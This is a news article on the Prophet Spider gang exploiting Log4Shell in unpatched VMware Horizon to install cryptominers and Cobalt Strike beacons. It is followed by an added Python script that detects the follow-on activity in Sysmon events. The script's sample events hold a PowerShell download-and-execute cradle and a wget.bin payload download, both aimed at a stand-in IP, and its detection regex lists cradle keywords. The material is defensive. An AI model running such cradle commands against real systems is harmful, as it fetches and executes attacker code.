The Prophet Spider gang uses the Log4Shell vulnerability to target the Tomcat service in unpatched VMware Horizon systems.

A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell (CVE-2021-44228), in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.

In a blog published Wednesday, BlackBerry researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.

The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances Cobalt Strike beacons, a kind of system backdoor, were also installed on the computers.

One of the indicators that helped pin the attacks to Prophet Spider was its use of the C:\Windows\Temp\7fde folder path to store malicious files, the researchers wrote. The threat actor also downloaded a copy of the wget.bin executable, which the group has historically used to get additional files onto infected hosts. The IP address used in the download cradle has also been previously attributed to the group.

Prophet Spider foothold suggests an uptick in exploits

BlackBerry Vice President of Global Services and Technical Operations Tony Lee explains that initial access brokers like Prophet Spider break into computer systems, establish a foothold, then sell that access to another malicious actor, who will steal data, move laterally through the environment, or deploy ransomware.
“If they find the vulnerability, they’ll exploit it,” he said, “and then wait to see who the highest bidder will be.”

“Now that they have the capability to gain a foothold in systems, I think we’ll see an uptick in Log4j exploitation,” Lee adds. Lee acknowledged that it was impossible to determine how many systems had been compromised by the group. “They can take anywhere from a couple of weeks to a month to sell access,” he explains. However, he says the BlackBerry Research & Intelligence and Incident Response teams were able to confirm intrusions at multiple organizations.

No individual industry vertical appeared to be in the gang’s crosshairs. “They seem opportunistic,” Lee says. “We haven’t seen a particular vertical being targeted. It’s more along the lines of ‘spray and pray.’”

Many VMware implementations remain unpatched

In their blog post, the BlackBerry researchers noted that the exact number of applications, and their various versions, affected by the Log4j vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerability, they explained, many implementations remain unpatched, leaving them susceptible to exploitation.

“It’s difficult for many organizations to scan and patch all their digital assets, even just the external-facing ones,” Lee says. “I see organizations struggling with just identifying their assets. If you can’t identify them, then you certainly can’t scan them.
And if you can’t scan them, then you can’t have an effective vulnerability management program.”
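The detection points the article raises (watching ws_TomcatService.exe for spawned shells, PowerShell download cradles, the C:\Windows\Temp\7fde staging path and the wget.bin downloader), turned into working detection logic as an added example; this is not code from the article or from BlackBerry's write-up. Field names follow Sysmon process-creation events (Event ID 1). The sample events, the Horizon install path under C:\Program Files\VMware\VMware View\Server\bin\ and the address 198.51.100.7 are constructed for illustration:

```python
"""Detection logic for Log4Shell follow-on activity behind VMware Horizon's Tomcat service.

Added example, not code from the article or from BlackBerry's write-up. It
applies the behavioural indicators the article lists to Sysmon-style
process-creation events (Event ID 1): ws_TomcatService.exe spawning a shell,
a PowerShell download cradle, the C:\\Windows\\Temp\\7fde staging directory
and the wget.bin downloader. The sample events, the Horizon install path and
the IP 198.51.100.7 are constructed.
"""
import ntpath
import re
from dataclasses import dataclass

HORIZON_TOMCAT = "ws_tomcatservice.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# PowerShell primitives commonly used in download cradles. Case-insensitive
# because PowerShell cmdlet and .NET member names are.
CRADLE_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)

# Host indicators attributed to Prophet Spider in the article (lower-cased).
STAGING_DIR = r"c:\windows\temp\7fde"
WGET_BIN = "wget.bin"


@dataclass
class Finding:
    rule: str
    severity: str
    event: dict


def _basename(path) -> str:
    """Windows basename, lower-cased; ntpath handles backslashes on any host."""
    return ntpath.basename(path or "").lower()


def analyze(event: dict) -> list:
    """Return the findings one Sysmon-style process-creation event triggers."""
    parent = _basename(event.get("ParentImage"))
    image_path = (event.get("Image") or "").lower()
    image = _basename(image_path)
    cmdline = event.get("CommandLine") or ""
    cmd_l = cmdline.lower()
    findings = []

    # The Tomcat service behind Horizon has no business launching a shell;
    # a JNDI lookup that reaches Log4j typically does exactly that.
    from_tomcat = parent == HORIZON_TOMCAT
    if from_tomcat and image in SHELLS:
        findings.append(Finding("horizon_tomcat_spawned_shell", "high", event))
    elif from_tomcat:
        findings.append(Finding("horizon_tomcat_spawned_process", "medium", event))

    # Second-stage retrieval via PowerShell; critical when the parent is Tomcat.
    if image in POWERSHELL and CRADLE_RE.search(cmdline):
        findings.append(Finding("powershell_download_cradle",
                                "critical" if from_tomcat else "medium", event))

    # Actor-specific artefacts: the staging folder and the wget.bin dropper.
    if STAGING_DIR in cmd_l or STAGING_DIR in image_path:
        findings.append(Finding("prophet_spider_staging_path", "high", event))
    if image == WGET_BIN or WGET_BIN in cmd_l:
        findings.append(Finding("wget_bin_dropper", "high", event))
    return findings


def scan(events) -> list:
    """Run analyze over a stream of events and flatten the findings."""
    return [f for e in events for f in analyze(e)]


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {   # benign interactive activity
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
    },
    {   # Horizon Tomcat launching a PowerShell cradle (install path assumed)
        "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://198.51.100.7/stage2.ps1')\"",
    },
    {   # second stage fetching a miner through wget.bin from the staging folder
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\Temp\7fde\wget.bin",
        "CommandLine": r"C:\Windows\Temp\7fde\wget.bin -O C:\Windows\Temp\7fde\svc.exe http://198.51.100.7/svc.exe",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.event['CommandLine']}")
```

The parent-child relationship (ws_TomcatService.exe spawning powershell.exe or cmd.exe) is the durable signal here and needs only process-creation telemetry with command-line capture (Sysmon Event ID 1, or Windows Security 4688 with command-line auditing enabled). The staging-path and wget.bin checks are actor-specific and will not survive a change in the group's tooling, so treat them as attribution aids rather than the primary alert. Tune the cradle expression against your own baseline: administrative scripts that legitimately call Invoke-WebRequest will match it when run from other parents, which is why the severity is only raised to critical when Tomcat is the parent.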